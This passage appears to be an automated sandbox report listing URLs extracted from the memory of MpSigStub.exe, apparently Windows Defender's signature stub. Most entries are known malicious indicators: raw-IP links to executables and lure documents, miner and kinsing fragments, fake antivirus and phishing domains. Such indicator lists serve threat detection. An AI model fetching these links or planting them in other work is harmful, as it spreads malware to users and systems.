Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.61.124/q-2/dy5434app14.exe
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.61.124/q-2/img_0107803.exe
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://209.62.108.213/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://209.62.108.220/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://20vp.cn/moyu/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://210302.top/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://212.109.196.67/gateway.php
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://212.129.31.67
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://212.192.241.203/xx/kl.exe
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://212.192.241.203/xx/kl.exex
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://212.237.58.208/0607/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://212.86.115.71/template.doc
Source: MpSigStub.exe, 00000026.00000003.18332517389.00000138BD29C000.00000004.00000001.sdmp	String found in binary or memory: http://213.159.117.134/index.php
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://213.159.213.195/d.exe
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://216.170.114.73/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://216.172.172.40/~agora546/cardoso/dilma.zip
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://217.73.6
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://217.8.117.60/arty.exe
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://217.8.117.63/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://218.204.253.145/setup.exe
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://22112017.flashplayeron.com
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://223.244.225.3:
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://22y456.com/
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://23.244.141.185/cgi-bin
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://23.249.163.163/qwerty.exe
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/.......................................
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.31/concord/
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.231.200/images/footer1.dll
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	String found in binary or memory: http://24-7-search.com/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://2fa.com-token-auth.com/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://2ndrequest.me/
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://2udating.com
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://2udating.net
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://3.0.242.71/wp-content/2_ur/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://31.192.209.
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://31.192.210.
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://31.192.211.
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://31.210.20.225:8080/server.exe")
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://3117488091/lib/jquery-3.2.1.min.js
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://3286924353/jb.jar
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://32player.com
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://365well.org/zload/get_exe.php?l=
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://37.10.71.35/scan001-jpeg.jar
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://37.120.206.70/dom/d.wbk
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://37.120.206.70/mend/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://37.120.206.70/mend/m.wbk
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://37.187.248.215/promo.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://3b3.org/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://3dcpw.net/house/404.htm
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://3dplayful.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://3gool.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://3novices.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://3rbfilm.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://3z.fi/evil1/PMwGWkmh
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://41.59.0.100/intranet
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://45.12.32.58/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://45.12.32.87/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://45.12.32.9/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://45.138.157.216/44313
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://45.138.172.158
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://45.139.236.86/scan.wbk?raw=true
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://45.145.185.85xmr=network001sys=sysrv002#killoldfilespkill-9
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://45.55.29.117/download/nsis/pb_nsissetup.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://45.63.107.19/PhilaeAp05.cpl
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://45.67.230.159/
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://45.77.255.68/5.sctscrobj.dll
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://45.84.1.195/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://45.85.90.14/i88/Kpbehmu.ex
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://45.89.127.230/images/yellowtank.png-o%appdata%
Source: MpSigStub.exe, 00000026.00000003.18351149084.00000138BD6B0000.00000004.00000001.sdmp	String found in binary or memory: http://45.9.148.35/chimaera/bin/rpm_deb_apk/x86_64/openssh.rpm
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://45.9.148.35/chimaera/sh/
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://45.90.59.77/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://45.90.59.97/44313
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://46.101.202.232/wp-includes/mx_ib/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://46.183.220.123/wxx.doc
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://46.243.136.238/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://46.30.43.8/gw.exe
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://47.89.187.54
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://4udating.net
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://5.1.83.182:8000/cgi-bin/hello.py?
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://5.135.73.116/win/document_0120200.doc
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://5.152.203.117/tues/invoice.doc
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://5.34.180.57/44313
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://5.39.217.221/win/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://50.63.128.
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://51.254.164.244/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://51.255.155.1/pages/filecloud/5e2d7b130cf4feb03023e580b3432fa9d71d7838.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://51.75.142.21/
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://51.81.114.167:
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://513389.cn/
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://54.214.246.97/log/SilentUpdater7/install
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%d
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%dx
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://58.65.235.3/up/get_exa.php?l=
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://58.65.239.124/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://58.65.239.82
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://5starvideos.com/main/
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://5starvideos.com/main/K
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://5starvideos.com/main/K5
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://5u2mr.com/unbbmevd/d76.php?l=oev4.cab
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://61.135.159.183/installer/sobar.exe
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://61.160.222.11:
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://61.19.253.
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://62.109.31.216/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://62.210.214.
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.176.248/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/CFL/
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/EX/
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/EX/x
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/K/F
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/NL2/?w=
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://64.156.31.
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://64.28.184.4/js.php?id=2011
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://65.181.112.251/coke/w8.txt
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.58/trafc-2/rfe.php
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.58/trafc-2/rfe.phpg
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.80/80
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://66.148.74.7/zu2/zc.php
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://66.40.9.246/binaries
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://66.98.138.92/PH/
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://67.15.
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://67.18.111.82:8088
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://67.210.122.222/~turks/lego/
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://68.178.225.162
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://69.31.80.
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://69.31.84.223/
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://69.50.164.11/v1/mh.php?pid=%s&cid=%s&p=%s&t=%s&vh=%i&vt=%i
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://69.64.36.110/msn.php?email=
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://6tof.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://7-.j-z-0-3-0-u-u-x-f-1l-3-l-h-w-b-q-z-u-5-n-l-l-m-s-5-v-s-z-g.info
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://70.38.40.185
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://72.29.80.113/~nossacai/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://74.cz
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://76h1.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://77.81.225.138/carnaval2017.zip
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://78.128.92.108/document/word.doc
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://78.128.92.26/
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://78.157.143.251
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://78.24.220.183/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://78.soupay.com/plugin/g.asp?id=
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: http://79.110.52.186/bayo/b.wbk
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://79.110.52.186/fide/f.wbk
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://79.110.52.186/naki/n.wbk
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://79.125.7.221/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://81.16.141.208/q37kkp
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://81.177.26.20/ayayay
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://82.118.23.186/
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.119.68/wp-admin/app/alim.doc
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.119.68/wp-admin/app/updates.doc
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.235.
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.235.63/cgi-bin/check/autoaff3
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://83.136.232.110/44285
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://83.149.75.54/cgi-bin
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.242.164/desktop-st7lsde/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.242.164/desktop-st7lsde/nay.dot
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.246.59/sgz2/rejoice/lowered.dot
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://85.17.3.151/cgi-bin
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://85.17.93.189/iddq/m
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://85.234.191.170/inst.php?id=
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://85.234.191.a7
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://85.255.11
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://85.255.11http://ad.eltext.comhttp://ad.tuzikmedia.biz.rsrc
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://88.208.17.127/
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://888888.2288.org/Monitor_INI
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://88888888.7766.org/ExeIni
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://89.188.16.
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://89.188.16.18/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://89.248.161.2/yourdoc.doc
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://89.45.14.196/p1/server
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://8nasrcity.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://91.142.64.91/quantserve/quant.js
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://91.227.18.58/sqwere/casma.gif
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://92.222.7.
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://92.38.135.46/43cfqysryip51zzq.php
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.106/c.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.153/good.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.60/c.exe
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://93.189.43.3/kinsingchmod
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://94.102.14.
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: http://94.103.85.236/ds/11.gif
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://94.156.174.7/up/a1a.htmyx_h=
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://94.23.210.144/promo/promo.php
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://94.23.39.156/fakeav/files.php?jsoncallback=?
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://94.75.
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://95.173.183.
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://95.46.99.199/template.doc
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://980.jlbtcg.cn
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://9ifz.org/2345
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://9nag0.com/unbbmevd/d76.php?l=oev2.cab
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://9o0gle.com/
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	String found in binary or memory: http://Andrei512.narod.ru
